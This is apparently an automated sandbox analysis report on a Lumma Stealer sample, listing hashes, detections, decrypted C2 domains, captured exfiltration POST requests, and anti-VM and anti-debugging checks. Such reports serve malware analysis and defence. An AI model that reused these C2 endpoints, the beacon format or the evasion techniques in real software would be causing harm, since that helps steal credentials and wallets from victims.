Windows Analysis Report
AaEBZ7icLd.exe

Overview

General Information

Sample name: AaEBZ7icLd.exe (renamed because the original name is a hash value)
Original sample name: 52135372423d0e2a9e1a9c11c188df25.exe
Analysis ID: 1581237
MD5: 52135372423d0e2a9e1a9c11c188df25
SHA1: 6809f399ba1106c2761da024156ebd606febfe39
SHA256: ad7dbcf74d0a449e97d6e4c94ce91f2c0b02414ae40ebfd523bffaa00ce1e29f
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AaEBZ7icLd.exe (PID: 5632 cmdline: "C:\Users\user\Desktop\AaEBZ7icLd.exe" MD5: 52135372423D0E2A9E1A9C11C188DF25)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "mindhandru.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:59:11.907933+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:13.895136+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:16.606177+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:19.060275+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:21.643605+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:24.460638+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:27.045522+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:30.334772+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49742 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:12.671287+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:14.650892+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:12.671287+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:14.650892+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:20.137751+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:27.062550+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 172.67.165.185 | 443 | TCP

AV Detection

Source: AaEBZ7icLd.exe | Avira: detected
Source: https://mindhandru.buzz:443/apil | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apiwa2C6 | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/s | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/gaBC8 | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/ms | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/piP | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/P | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/Y | Avira URL Cloud: Label: malware
Source: AaEBZ7icLd.exe.5632.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "mindhandru.buzz"], "Build id": "PsFKDg--pablo"}
Source: AaEBZ7icLd.exe | Virustotal: Detection: 56%
Source: AaEBZ7icLd.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: AaEBZ7icLd.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: AaEBZ7icLd.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49736 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49713 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49713 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49711 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49736 -> 172.67.165.185:443
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2LF9ILW66AEACCQ6TM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12835 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=AGNW0CGYF99SV8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15053 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=T6NABLCP2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20513 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=M02EWWBEYB8UUNW6QO | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1256 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5KSXFNFJUILJS228X71 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 569731 | Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49736 version: TLS 1.2

                System Summary

                Source: AaEBZ7icLd.exe | Static PE information: section name:
                Source: AaEBZ7icLd.exe | Static PE information: section name: .idata
                Source: AaEBZ7icLd.exe | Static PE information: section name:
                Source: AaEBZ7icLd.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: AaEBZ7icLd.exe | Static PE information: Section: ZLIB complexity 0.9995787377450981
                Source: AaEBZ7icLd.exe | Static PE information: Section: nyylnyuw ZLIB complexity 0.9946991614941669
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198757587.0000000005837000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2224159738.0000000005837000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198630257.0000000005841000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: AaEBZ7icLd.exe | Virustotal: Detection: 56%
                Source: AaEBZ7icLd.exe | ReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | File read: C:\Users\user\Desktop\AaEBZ7icLd.exe
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Section loaded: version.dll
                Source: AaEBZ7icLd.exe | Static file information: File size 1883648 > 1048576
                Source: AaEBZ7icLd.exe | Static PE information: Raw size of nyylnyuw is bigger than: 0x100000 < 0x1a1e00

                Data Obfuscation

                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Unpacked PE file: 0.2.AaEBZ7icLd.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nyylnyuw:EW;dppqrxbg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nyylnyuw:EW;dppqrxbg:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: AaEBZ7icLd.exe | Static PE information: real checksum: 0x1cf69b should be: 0x1cdf4e
                Source: AaEBZ7icLd.exe | Static PE information: section name:
                Source: AaEBZ7icLd.exe | Static PE information: section name: .idata
                Source: AaEBZ7icLd.exe | Static PE information: section name:
                Source: AaEBZ7icLd.exe | Static PE information: section name: nyylnyuw
                Source: AaEBZ7icLd.exe | Static PE information: section name: dppqrxbg
                Source: AaEBZ7icLd.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Code function: 0_3_01084CE8 push es; retn 0042h | 0_3_01084EE9
                Source: AaEBZ7icLd.exe | Static PE information: section name: entropy: 7.983643456292964
                Source: AaEBZ7icLd.exe | Static PE information: section name: nyylnyuw entropy: 7.9545802741870855

                Boot Survival

                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E719B second address: 5E71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E71A4 second address: 5E71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E71A8 second address: 5E71C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 js 00007F909CBB3516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E7338 second address: 5E7356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007F909C7BD306h 0x0000000d jg 00007F909C7BD306h 0x00000013 pop edx 0x00000014 je 00007F909C7BD30Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA770 second address: 5EA77A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA77A second address: 5EA77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA77E second address: 5EA7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop eax 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 pushad 0x00000019 jne 00007F909CBB3516h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 pop ecx 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007F909CBB351Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F909CBB3516h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAC9A second address: 5EAC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAC9E second address: 5EACA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAE3F second address: 5EAE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F909C7BD306h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB7B2 second address: 5EB7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
